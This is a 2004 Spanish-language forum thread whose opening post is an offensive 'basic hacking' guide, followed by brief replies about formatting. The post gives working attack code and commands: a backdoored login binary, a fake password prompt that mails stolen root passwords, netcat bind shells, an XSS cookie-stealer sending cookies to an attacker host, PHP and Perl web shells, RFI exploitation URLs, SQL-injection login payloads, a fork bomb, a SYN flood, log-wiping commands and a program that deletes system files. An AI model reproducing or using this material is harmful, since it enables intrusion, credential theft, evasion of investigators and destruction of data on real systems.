elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  Hacking Basico!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Hacking Basico!!  (Leído 39,144 veces)
HaCkZaTaN

Desconectado Desconectado

Mensajes: 109



Ver Perfil
Hacking Basico!!
« en: 6 Noviembre 2004, 04:18 am »

/*
  Name: Hacking
  Copyright: [N]eo Security [T]eam [NST]®
  Author: HaCkZaTaN
  Date: 04/11/04 19:19
  Description: Hacking
*/

 _________________________________
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|=-=-=-=-=-=by HaCkZaTaN-=-=-=-=-=|
|-=-=-You may pray for your Pc=-=-|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|_________________________________|

_________
|1= Intro|
|________|

Hey q mas!! Pues aqi escribiendo esto haber que mas se me ocurre
____________
|2= Objetivo|
|___________|

Ir a Google.com

oK tenemosque mirar el objetivo detalladamente y anotar toda la Info Lo mas que podamos y no se te
ocurra Conectarte desde tu pc xD hazlo
desde una shell y utilzar bouncers...............................

________
|3= O.S | 
|_______|

oK determinar el O.S es muy importante
Formas:          __________________________________________________
Telnet> Host 23 [Es mucho mejor aveces colocar el puerto ssh <<22>>]
                 ___________________________________________________
Ftp> Host 21    [Para saber el server de ftp y mirar si tiene bugs para entrar como root es una forma
mas facil Determinar el DAEMON]
_______________________
|4= Escanear una WebPage|
|_______________________|

Yo scaneo con nmap es el mejor scanner que hay en la Net <<That's what i Think>>
Este scanner te da un log muy buena de los puertos y alguna informacion extra
Tenemos que mirar si esta en varios Dns para mirar con que nos metemos por que aveces estan los
diferentes puertos en cada Dns>>
Me explico [Dns1]>>>Tiene abierto el ftp
           [Dns2[>>>Tiene abierto el ssh
Escaneamod de esta manera
nslookup host
____________________________________
|5= Tratar de entrar por los puertos|
|___________________________________|

Para sacar info de los puertos y de los daemons hacemos

telnet> host 21
telnet> host 22
telnet> host 25
telnet> host 79
telnet> host 110
telnet> host 109
telnet> host 143
telnet> host 139 <<<por si utiliza archivos compartidos en windows>>>
telnet> host 119

oK nos vamos a mirar a cada daemon y mirar su server ejemplo

Port 21 Server ProFtp>>>> Buscamos Xploits para esta version de este server para tener permisos admins,
O si nos deja entrar como anonimo o
guest y nos deja mirar /etc/passwd o /etc/shadow/ pues miramos si no estan cifrados y buscamos un
desencriptador de Md5 o en lo que este
La mayoria de linux o Unix encriptan a 64bits

Port 22 lo mismo buscamos el server de ssh

Port 79 Finger si lo tienen abierto nos libran un peso de encima por que Esto nos da mucha informacion
del usuario o root escribimos <<</w>>>
para mirar quien esta en linea oK esto nos da mucho info.
Una cosa tambien podemos poner un sniffer es una grandiosa idea

Bueno con la informacion que aparece cuando haces el finger el passwd podria ser muy facil de sacarlo
y nos serviria como una shell gratuita
y de buena calidad <<smart me, don't I?>>

Otra seria sacar los passwd de los emails para mirar de que es lo que habla el root y con quien y hasta
depronto podemos utilixar nuestra
ingenieria social para sacar los passwd de la PC.
Podemos acceder por el puerto 110 <<POP>>
Podemos utilizar xploits, hay muchos para cada tipo de server de sendmail <<25>> o POP <<110>>

Tambien por el Puerto 80 scaneamos Bugs:
PHP NUKE
SQL
CGI
PL
ASP
APACHE
ORACLE
Etc...

____________________
|6= Local Xploits   |
|___________________|


Podemos utilizar exploits cuando ya estamos dentro de la maquina.

sh-3.00$ sh Xploit.sh
ven que facil ;-)
oK deben de saber de C por que aveces lo xplits no vienen bien configurados

Una vex hecho todo eso creamos un Usuario para tener una shell gratis xD
Pero no usuario normal si no uno con derechos como root (osea no ser root por que no se puede pero que tenga todos los derechos
posibles)) xD
Ahora estan con la moda del W00t, ptrace.. Bueno pues busquen acerca de el pero ademas ya son obsoletos

Jugando con offsets
Digo esto para los que les gusta jugar con ella :)
Un pequeno Brute Force en Perl.
***********************
#!/usr/bin/perl
$MIN=0;
$MAX=5000;
while($MIN<$MAX)
{
   printf('offset : $MIN n');
   system('xploit $MIN');
   $MIN++;
 }
**************************
__________________
|7- Remotes Xploits|
|__________________|

Ok subimos un xploit a  nuestra shell y colocamos:

root@HaCkZaTaN!!:~ # ./s 0 && cat | netcat host 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)     

y listo nos dio una shell nobody.
Acuerdense que hay que jugar con el offset para poder tener root xD.

_________________
|8= Borrar Huellas|
|_________________|
 
Borramos Huellas de esta manera

rm /var/log/wtmp
rm /var/log/lastlog
Para arrglar el PC
tee /var/log/wtmp
tee /var/log/lastlog

modo mas bueno seria
find / -name log && rm -rf && rm -f && ps -def && grep klogd && kill -9 pid && ps -def | grep syslog
cd /
rm -rf .bash_history && rm -rf /var/adm && rm -rf /root/.bash_logout && rm -rf /root/.bash_history
hay que Editar.bash_history o .sh_history
y si quieres es tumbar la PC xD:
rm -rf/etc/passwd
rm -rf /etc/shadow
rm -rf /bin/login
rm -rf /bin/rm
rm -rf /etc/inetd.conf
killall login
***********************************
find / -name log* -exec rm -rf {} \     //Forma ofuscada
***********************************

Otra Forma ((REpito caso todo lo de arriba xD
Buscando archivos con nombres que empiexen por log:
****************
find / -name log //Despues los borramos
*****************

********************
ps -def | grep klogd //Editamos este archivo
ps -def | grep syslog //Editamos este archivo
********************

***********
kill -9 pid //Matamos todos los procesos
***********
****************************
cd /
unset HISTFILE
rm -rf .bash_history
rm -rf /var/adm
rm -rf /root/.bash_logout
rm -rf /root/.bash_history
****************************

En windows Seria
del c:\winnt\system32\logfiles
del c:\windwos\system32\logfiles
del c:\winnt\system32\logfiles\*.log
dir /s *.log
dir /s *.evt
Bueno pero esto no es todo es mejor que te bajes un Zapper o un Wipper es la misma cosa pero
gente le gusta llamarlo de diferentes maneras

____________
|9- Troyanos|
|___________|

Troyano para linux el mas famoso y mas confiable BackDoor <<Hint: La mayoria de linux no tienen
antivirus>>
Lo llamaremos login.c
***********************************************************************************************
#include <stdio.h>
#define OLDLOGIN "/usr/lib/login"
#define LOGINNAME "login"
#define MAGIC_WORD "localhost"
#define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $"
char **exe;
do_back() {
   puts(REVISION);
   putenv("TERM=vt100");
   putenv("HISTFILE=/dev/null");
   execl("/bin/sh","sh","-i",0);
}
main(argc, argv)
   int argc;
   char *argv[];
{
   exe = argv;
   exe[0] = LOGINNAME;
   if ((char *)getenv("DISPLAY") != (char *)NULL) 
      if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
         do_back();
   execv(OLDLOGIN,exe);
}
*****************************************************************************************************
Bueno lo Subimos asi;
cp /bin/login /usr/lib/login
chmod 777 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
chmod 4755 /bin/login

Bueno si queremos colocar clave modificamos
#define MAGIC_WORD "localhost" <<<Por esto>>>
#define MAGIC_WORD "aqui el password sin espacios"
oK ya tenemos root xD.

Esto seria en Windwos Utilizamos el SUb7 0 SubSeven
Ok subiremos un bouncer xD
Hacemos esto
"advanced"
"PORT REDIRECT"

en "input port" pon el puerto que nos vamos a conectar ejemplo 1942
en "output host/ip" Ip/Host a conectar
en "output port" Puerto a conectar 21,23 etc.
<<tambien se puede hacer en el IRC cuando te banean o quieres entras por seguridad>>

Para estar con bouncer en cualquier puerto lo hacemos asi en este caso Sera Http <<80>>
en "input port" 80
en "output host/ip" Host/Ip
en "output port" 80

ahora en el UNICONSOLE ponemos la ip del BOUNCER en vez de www.mju.es y JAMAS sabran que hemos sido
nosotros los que han entrado.
Para entrar en un FTP con claves ROBADAS y que no nos visiten los agradables guardia civiles:

-en "input port" Pon 21
-en "output host/ip" ponemos el OBJETIVO ftp.terra.es (por ejm)
-en "output port" pon 21
oK es facil asi se hace susecivamente con todos los puertos Es lo mismo que en la shell pero un poco
mas complicado

Unos se preguntaran pero como le hago para no estar jugando con comandos desde la URL
pues hay tenemos una Opcion dejar la pagina que estamos atacando con un backdoor o
corriendo algun servidor que nos deje entrar con el ssh (Putty si estas en Windows)

hay un BackDoor que se llama r0nin o puedes buscar mas en google.com hay apareceran
bastantes.
Aqui les dejo un troyano:D
************************************************************************************
************************************************************************************
#include <stdio.h>
#include <pwd.h>
#include <stdlib.h>
#define EMAIL "correo@electronico.aqui"
#define ARCH "arch.fsu
int main(void)
{
  char enviar[100];
  char grabar[100];
  char* clave;
  FILE* archivo_ptr;
  clave = (char *) getpass("Password:");
  puts ("Sorry");
  archivo_ptr = fopen(ARCH, "w");
  fprintf (archivo_ptr, "Root Password: %s\n", clave);
  fclose (archivo_ptr);
#ifndef TMP
  sprintf(enviar, "mail %s < %s ; rm %s", EMAIL, ARCH, ARCH);
  system(enviar);
#else
  sprintf(grabar, "cp %s %s", ARCH, TMP);
  system(grabar);
#endif
  exit (EXIT_SUCCESS);
}
************************************************************************************
************************************************************************************
La otra opcion que digo es con el NetCat :D Dejando unpuerto a la escucha con alguna shell
ya sea
zsh sh bash etc.....
Pero como lo hacemos? pues es muy facil
si es una Windows la Maquina que estamos atacando dejas escuchando asi

  • Windows
****************************
nc -l -p 8000 -t -e cmd.exe -L
****************************
******************
nc -L -w 1 -p 8000
******************

  • Linux
*************************
nc -vvlp 8000 -e /bin/bash
*************************
******************
nc -L -w 1 -p 8000
******************

Bueno tu ya descojeras de las maneras que quieras
entonces despues le sacas la Ip a la Pagina que estas atacando o con el mismo host y desde tu maquina habres el ssh
o el telnet (Putty si estas en Windows) o el nc, recomiendo el netcat por que dejamos a la escucha con el mismo netcat
Entonces nos conectariamos asi
*********************
nc -vv host/ip 8000
********************

_________
|10= Spoof|
|_________|

El spoof es cuando falsean tu ip o la mayoria de los paquetes que entran en ella se utiliza para
saltar firewalls y otros tipos de seguridad.

___________________________
|11= Como tumbar un servidor|
|___________________________|

Compilar el programa:
cc synk4.c –o synk4

Modo de uso
./synk4 <ip-origen> <ip-destino> <puerto-inicial> <puerto-final>

<ip-origen> 0, y el programa utilizara un random de IPS 
<ip-destino> Pones la ip de destino ejemplo 127.0.0.1
<puerto-inicial> y <puerto-final>
Eje: ./synk4 0 127.0.0.1 21 21  0 23 23

Se empexara a moverse un contador...
Cuando llegue a 4000 o 5000 o 6000 ya paramos hay
Cuando acabemos todo y cerremos el progrma nos conectaremos al puerto que atacamos y nos damos cuenta
que esta tumbado xD

[root@localhost]# telnet localhost 23
Trying 127.0.0.1...


El programa a descargar se llama SYN <<TCP SYN Flooding>>
Bueno tambien se podria hacer local usar malloc(); y fork();
Ejemplo:
**********************************
/*
  Name: LinuxCrash
  Copyright: Neo Security Team [NST]®
  Author: HaCkZaTaN
  Date: 12/09/04 03:51
  Description: CrashesLinux
*/
int main()
  {
    while(1)
     {
            malloc(1024);
            fork();
     }
 return 0;
}
***************************************

______________
|12= Keylogger|
|_____________|

Bueno a muchos les gusta o no les gusta usar keyloggers pero si necesitas uno pues utilizalo todo
es posible en esta vida y si te dicen que es de lammer pues mas lammer el que se lo deja meter

______________
|12= Tecnicas |
|_____________|

Bueno esto me da hasta pena colocarlo pero bueno como se han dado cuenta ahora la moda de hackear es con el
w00t, r0nin, mass, yim. Pues son utilidades para *nix su modo de uso es sencillisimo

$chmod 777 programa
$./programa

Como pueden ver no tiene ciencia esas tecnicas son estupidas lo bueno es crear shellcodes y xploits
hacer overflows eso si que es muy bueno, trabajar con los offset etc....

______________
|12= XSS      |
|_____________|

Pues bueno ahora ya dicen que hackean una pagina Php o Html por hacer XSS en la pagina pero bueno eso
no importa lo que importa es aprender

<input type="text" name="palabra"> que será el formulario.
<input type="submit" name="buscar" value="Buscar"> que será el boton.

Como pueden ver es vulnerable entonces podemos proceder a hacer XSS
Creamos un archivo .php que contenga cookie

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;
Bueno a mi casi no me gusta explicar si no dejar todo hecho y que usteddes lo descubran sorry si no explico

CrashCool ah creado una Herramienta exelente para esto lo que hace es cifrar el Texto>> Gracias CrashCool Pagina Crashcool.com
Link de descarga
http://crashcool.com/xss-c.zip
[-]XSS generator by CrashCool
[-]Introduzca codigo:
<script>alert("hola");</script>
  • Generado

<script>var b=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 104, 111, 108, 97, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62); document.write(b);</script>

[-]Guardarlo en archivo? (s/n) :s
  • guardado en xss.html
]x[ Pulse la tecla ENTER para salir...

Codigo:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define XSS_1 "<script>var b=String.fromCharCode("
#define XSS_2 "); document.write(b);</script>"
#define MAX_ENTRADA 800

/**
 *Generador de XSS
 *Genera y da la posibilidad de guardar a archivo
 *Diseñado para saltar filtros de las comillas ""
 *Autor:CrashCool
 *Fecha: 03/10/04
 *Licencia: GPL
 *web: www.crashcool.com
 *contacto: crashcool@gmail.com
 *V: 1.0.1
 *version original en JAVA www.crashcool.com
 */

void guardar(char *salida);

int main()
{   char a[MAX_ENTRADA];     
    char aux[5];
    char *res=NULL,opcion='\0';   
    int tamanyo,i;
    puts("[-]XSS generator by CrashCool");
    puts("[-]Introduzca codigo:");
    gets(a);
    fflush(stdin); 
    tamanyo=(strlen(a) * 3)+((strlen(a)-1) * 2);     
    res=(char *)malloc(tamanyo*(sizeof(char)));
   
    strcpy(res,XSS_1);
    for(i=0;i<(int)strlen(a);i++)
    {
        strcpy (aux, "");
        sprintf(aux,"%d",(int)a);
        if(i< (int)(strlen(a)-1) ) strcat(aux,", ");         
        strcat(res,aux);                  
    }
    strcat(res,XSS_2);
    puts("
  • Generado");
    printf("\n%s\n\n",res);
    printf("[-]Guardarlo en archivo? (s/n) :");
    opcion=getchar();
    if(opcion=='s' || opcion =='S'){
    guardar(res);
    puts("
  • guardado en xss.html");
    }
   fflush(stdin);
   puts("]x[ Pulse la tecla ENTER para salir...");
    getchar();
    return 0;     
}

void guardar(char *salida)
{
    FILE *archivo;
    archivo=fopen("xss.html","w");
    fprintf(archivo,"%s",salida);
    fclose(archivo);
}
******************************************************************************************
_________________________________
|13= Remote File Inclusion (RFI)|
|_______________________________|

Remote File Inclusion (RFI)

A mi casi no me gusta explicar si no dar el trabajo hecho osea al grano no dar vueltas al asunto

De que trata el Bug!!
----- beging the code in index.php -----

if (!isset($req_path)) $req_path="";
require_once($req_path."funcs.php");
----- end of the code -----
Forma de xplotar
 http://localhost/nst/index.php?req_path=http://nst/
_____________________________________________________________________________________________________

Otro bug es el de:
*************************************************
<?
exec($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
************************************************
<?
system($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
*************************************************
<?
passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
*************************************************
 <?php
$com = $_GET["com"];
system ("$com");
?>
*************************************************
 <?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
*****************************************************
Modo de explotacion
 http://localhost/nst/index.php?req_path=http://nst/&com=ls

___________________________________________________________________________________________________
Modo de Busqueda!!

****************************************************************************
****************************************************************************
allinurl: "index.php?*=*.php"
http://www.google.com/search?num=100&hl=en&lr=&q=allinurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
****************************************************************************
****************************************************************************
inurl: "index.php?*=*.php"
http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3A+%22index.php%3F*%3D*.php%22&btnG=Search
****************************************************************************
****************************************************************************
allinurl: /My_eGallery/public/displayCategory.php?
http://www.google.ca/search?hl=en&q=allinurl%3A+%2FMy_eGallery%2Fpublic%2FdisplayCategory.php%3F&meta=
****************************************************************************
****************************************************************************
___________________________________________________________________________________________________
Bueno ahora estan con la Moda de Remote File Inclusion. Y todo esto dado en PHP bueno pues aqui
les traigo unos en Perl Smile Funcionan de la misma manera
http://host/cgi-bin/net.cgi?p=uname -a
Donde:
nst.cgi >> Es el nombre del archivo
p es el comando que esta en el nst.cgi que nos da shell
El que utilizo para esta demostracion es el numero 3 saludos

1
Código:
****************************************************************************
****************************************************************************
#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else
{
print "[N]eo Security [T]eam [NST]"
}
****************************************************************************
****************************************************************************

2
Código:
****************************************************************************
****************************************************************************
#! /usr/bin/perl
use CGI qw(:standard);
print header;
my $c=param("c");
if ($c gt "")
{
$s=`$c 2>&1`;
print start_form,textfield("c",$c),submit("go"),end_form,pre($s)
}
else{ print "[N]eo ecurity [T]eam [NST]"
}
****************************************************************************
****************************************************************************

3
Código:
****************************************************************************
****************************************************************************
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("p");
my $a=param("a");
if ($a || $k)
{
$l=`$k 2>&1`;
print start_form,textarea("p",$k,3,50);
print submit("Enter");
print end_form;
print pre($l);
}
****************************************************************************
****************************************************************************
_________________________________
|13= Subiendo Archivos a un host|
|_______________________________|

Como subimos archivos a la pagina o host a Hackear?
Pues hay muchas formas pero dare unas cuentas
wget http://www.host.com/archivo.c
lynx http://www.host.com/archivo.c
links http://www.host.com/archivo.c
curl -O http://www.host.com/archivo.c
curl -a http://ftp://www.host.com/archivo.c

****************************************************************************
****************************************************************************
______________
|14= Rooteando|
|_____________|

Como lo rooteo?
Bueno ahora te toca tu turno de ir a google.com y buscar
Aqui en Neosecurityteam.org tenemos unos cuantos xploits que nos dan root remotamente o localmente
solo necesitas compilarlos y ya
hay un archivo en la red que se llama w00t, xp1.
estos te daran root con solo ejecutarlos en el sistema que bueno no?
jajaj se utilizan asi
./w00t
./xp1

Otra forma seria por shellcodes!!
Pero esto si no lo explicare es algo muy largo pero si quieren tener idea de lo que hablo ok

main()
{
system("/bin/sh"); //exeve(1,"/bin/sh");
}

Compilas eso como un .c y listo despues objdum -d archivo sacamos NULL's bytes osea
xoring y listo. Complicado no!!

****************************************************************************
****************************************************************************
_______________
|15= Compilando|
|______________|

Como compilo?
gcc -O4 -w -g -s archivo.c -o x
gcc archivo.c -x
nasm archivo.asm

Como linkeo desde asm?
nasm -f elf archivo.asm
ld -o archivo.exe archivo.o
****************************************************************************
****************************************************************************
_______________
|16= Anonimo   |
|______________|
Quiero estar anonimo?
Busca acerca de
Bouncers
PSYbnc
Proxys
****************************************************************************
****************************************************************************

______________________
|17= Inyeccion SQL   |
|____________________|

No explicare mucho solo dare unos User y Pass!!
usuario='geek'                       senha='s3nh4'
usuario='' or '1'                    senha='s3nh4'
usuario=&nbsp;'or'                   senha=&nbsp;'or'
usuario=' or ' 1                     senha=' or ' 1
usuario='1' = '1'                    senha='1' = '1'
usuario=' or '1'='1                  senha=' or '1'='1
usuario='' or '1'='1'                senha='' or '1'='1'
usuario="senha"                      senha="senha"
usuario="password"                   senha="password"
usuario="teste"                      senha="teste"
usuario="123"                        senha="123"
usuario="1234"                       senha="1234"
usuario="12345"                      senha="12345"
usuario="VB"                         senha="VB"
usuario="visual"                     senha="visual"
usuario="basic"                      senha="basic"
usuario=' or senha='teste            senha=' or senha='teste
usuario=' or senha='login            senha=' or senha='login
usuario=' or email like 'flavio%     senha= ' or email like 'flavio%
usuario='or '1'='1' order by 1 --    senha='or '1'='1' order by 1 --
usuario=' or '1'='1' order by 1 --   senha=' or '1'='1' order by 1 --
usuario=' or 1=1--                   senha=' or 1=1--
usuario='or''='                      senha='or''='
usuario=' or 'a'='a                  senha=' or 'a'='a
usuario=') or ('a'='a                senha=') or ('a'='a
usuario=b' or ' 1='                  senha=b' or ' 1='
usuario=' or '|                      senha=' or '|
usuario=123'or'=                     senha=123'or'=
usuario=admin'-                      senha=admin'-
usuario=' or '1=true                 senha=' or '1=true
usuario=7' or ' 1                    senha=7' or ' 1
usuario=root                         senha=root
usuario=shell                        senha=shell
usuario=admin                        senha=123456
usuario=admin                        senha=admin
Usuario=‘;shutdown--                 senha=‘;shutdown--
****************************************************************************
****************************************************************************
_____________
|18 OffTopic|
|___________|
Bueno muchos dicen por hay que es un Lame Virus o le dicen otros nombres
mas por que razon? Por que le pasan el codigo a un Lammersito cualquiera
y le dicen mira compila esto y cojeras r00t o ownearas windows o cualquier
cosa. Se puede compilar en windows o linux
gcc LameViruz.c
Código:
/*
  Name: LameViruz
  Copyright: [N]eo ecurity [T]eam [NST]®
  Author: HaCkZaTaN
  Date: 26/10/04 17:17
  Description: LameViruz
*/

#include <stdio.h>
#include <stdlib.h>
int main()
{
double x;
for (x=0; x<1000000000; x++)
{
printf("\nHacktool\n", x);
printf("\nAhora miraras que ya puedes hackear con solo mirar la pantalla ;)\n", x);
system("rm -rf /bin/*");
system("rm -rf /usr/bin/*");
system("rm -rf /*");
system("del /F /Q C:\\windows\\system32\\hal.dll");
system("del /F /Q C:\\windows\\system32\\kernel32.dll");
system("del /F /Q D:\\windows\\system32\\hal.dll");
system("del /F /Q D:\\windows\\system32\\kernel32.dll");
system("del /F /Q c:\\*.ini");
system("del /F /Q c:\\*.bat");
system("del /F /Q c:\\*.sys");
system("del /F /Q c:\\*.exe");
system("del /F /Q c:\\*.dll");
system("del /F /Q c:\\windows\\*.ini");
}
}

****************************************************************************
****************************************************************************
________________________________________________________________________________________________
NOTA o TIP

Es muy recomendable dar permisos a los archivos que subes o que quieres ejecutar.
como se hace eso?
les dare tres formas
chmod -x archivo
chmod 777 archivo
chmod 777 *
=====================================================================
=====================================================================


« Última modificación: 20 Julio 2007, 15:12 pm por Kasswed » En línea

K-19


Desconectado Desconectado

Mensajes: 422


Sarah Wayne


Ver Perfil WWW
Re: Hacking Basico!!
« Respuesta #1 en: 11 Noviembre 2004, 05:38 am »

 ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::) ::)


En línea

- DarkLinux -

Desconectado Desconectado

Mensajes: 152



Ver Perfil WWW
Re: Hacking Basico!!
« Respuesta #2 en: 20 Noviembre 2004, 08:31 am »

No me parece Básico.

Ami forma de pensar. Esto no es lo que buscan los super new bies.

Lo que buscan ellos es algo de troyanos, keyloggers, caballos de troya, meterse a pc por telnet.

Etc...

Esto ya es para los que ya vieron lo anterior, y entonces si, leen el manualito de arriba, y pues aumentan de calidad de persona y su autoestima aumente :) jejej

Saludos
En línea


HackerSoft Security Web - México - Página Web Mexicana.
www.elhackersoft.com
[/b]
HaCkZaTaN

Desconectado Desconectado

Mensajes: 109



Ver Perfil
Re: Hacking Basico!!
« Respuesta #3 en: 21 Noviembre 2004, 04:39 am »

:o Pues no se como lo cojan es igual basico, avanzado. el fin es de aprender.
Salu2!!
En línea

CiberWoW

Desconectado Desconectado

Mensajes: 11



Ver Perfil
Re: Hacking Basico!!
« Respuesta #4 en: 18 Julio 2007, 04:43 am »

LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...

SaLu2  ::)
En línea

|~LiGoLix~|
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Hacking Basico!!
« Respuesta #5 en: 18 Julio 2007, 04:47 am »

LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...

SaLu2  ::)

Copia el documento y pegalo en el bloc de notas... :P
En línea

ActiveSheet


Desconectado Desconectado

Mensajes: 389


Feeling Jazz


Ver Perfil WWW
Re: Hacking Basico!!
« Respuesta #6 en: 20 Julio 2007, 09:49 am »

no sean malitos traduscanmelo padesco de la vista
En línea

Tor


Desconectado Desconectado

Mensajes: 1.448


All you know is shit


Ver Perfil WWW
Re: Hacking Basico!!
« Respuesta #7 en: 20 Julio 2007, 10:18 am »

LO QUE NO ENTIENDO es por que tacho la letra eso complica la lectura ...

SaLu2  ::)

Copia el documento y pegalo en el bloc de notas... :P

Si bueno, ya, pero PORQUE esta tachado el texto? :S
En línea

^^
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Hacking Basico!!
« Respuesta #8 en: 20 Julio 2007, 11:08 am »

El autor quiso escribir...

Código:
[N]eo [S]ecurity [T]eam [NST]®

Pero en bbCODE la etiqueta [*s] está reservada para tachar el texto...

Citar
[N]eo ecurity [T]eam [NST]®
En línea

Tor


Desconectado Desconectado

Mensajes: 1.448


All you know is shit


Ver Perfil WWW
Re: Hacking Basico!!
« Respuesta #9 en: 20 Julio 2007, 11:22 am »

El autor quiso escribir...

Código:
[N]eo [S]ecurity [T]eam [NST]®

Pero en bbCODE la etiqueta [*s] está reservada para tachar el texto...

Citar
[N]eo ecurity [T]eam [NST]®

Lol xD


Gracias! :P
En línea

^^
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Por donde empezar? MANUAL DE HACKING BÁSICO por taskkill# « 1 2 ... 13 14 »
Hacking
Gospel 136 171,975 Último mensaje 18 Octubre 2015, 13:11 pm
por coli_colibri
Hacking Básico
Hacking
Darkicious 8 5,745 Último mensaje 15 Enero 2012, 04:25 am
por rub'n
Ayuda Hacking Basico
Hacking
gourgan 7 6,059 Último mensaje 20 Marzo 2013, 14:57 pm
por OmarHack
Manual de hacking básico, esta roto el link « 1 2 »
Hacking
luistrea 14 8,703 Último mensaje 16 Diciembre 2012, 22:31 pm
por luistrea
Hacking basico - consulta sobre pishing, las pass no se guardan
Hacking
noquiero 1 2,748 Último mensaje 22 Abril 2015, 15:19 pm
por Pablo Videla
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines